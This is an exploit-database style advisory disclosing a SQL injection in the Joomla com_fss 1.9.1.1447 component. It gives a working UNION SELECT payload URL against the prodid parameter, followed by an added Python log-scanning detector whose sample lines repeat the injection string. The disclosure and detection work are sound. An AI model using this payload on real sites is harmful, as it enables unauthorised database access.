Joomla! Component com_fss 1.9.1.1447 - SQL Injection



EKU-ID: 27587 CVE: OSVDB-86499 OSVDB-ID:
Author: D4NB4R Published: 2012-10-19 Verified: Verified


 Exploit Title: Joomla Freestyle Support com_fss sqli

 Dork: N/A

 Date: [17-10-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 Vendor: http://freestyle-joomla.com

 Version: Version 1.9.1.1447 (last update on Oct 15, 2012)

 License: Commercial

 Download: http://freestyle-joomla.com/fssdownloads

 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Special greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Joomla component description:

Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.

Warning: Invalid argument supplied for foreach() in


Exploit:


    SQL : SQL injection

           http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R


_____________________________________________________
Daniel Barragan "D4NB4R" 2012
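
A detection check for the request shown above, as an added example that is not part of the original advisory: it flags access-log requests to `com_fss` whose decoded `prodid` value is not a plain integer. The log lines are constructed samples, and treating `prodid` as an integer ID is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Oct/2012:10:01:02 +0000] "GET /index.php?option=com_fss&view=kb&prodid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Oct/2012:10:02:41 +0000] "GET /index.php?option=com_fss&view=test&prodid=1%27+union+all+select+1%2Cversion()--+x HTTP/1.1" 200 734',
    '198.51.100.8 - - [19/Oct/2012:10:03:10 +0000] "GET /index.php?option=com_content&prodid=abc HTTP/1.1" 200 900',
    '192.0.2.44 - - [19/Oct/2012:10:04:55 +0000] "GET /index.php?option=com_fss&view=test&prodid=2%2527 HTTP/1.1" 200 734',
]

# Pulls the request target out of a common/combined log format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate prodid is a plain integer ID.
NUMERIC_ID = re.compile(r'\d+')


def suspicious_prodid(line):
    """Return the decoded prodid if a com_fss request carries a
    non-integer value, otherwise None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    # parse_qs URL-decodes once, so %27 and + are seen as ' and space.
    query = parse_qs(urlsplit(match.group(1)).query)
    if "com_fss" not in query.get("option", []):
        return None
    for value in query.get("prodid", []):
        # Allow-list check: anything that is not all digits is flagged,
        # which also catches double-encoded input such as %2527.
        if not NUMERIC_ID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_prodid) for every flagged line."""
    hits = []
    for line in lines:
        value = suspicious_prodid(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tprodid={value!r}")
```

The same integer allow-list is the check to apply at a WAF or in front of the component until a fixed version is installed.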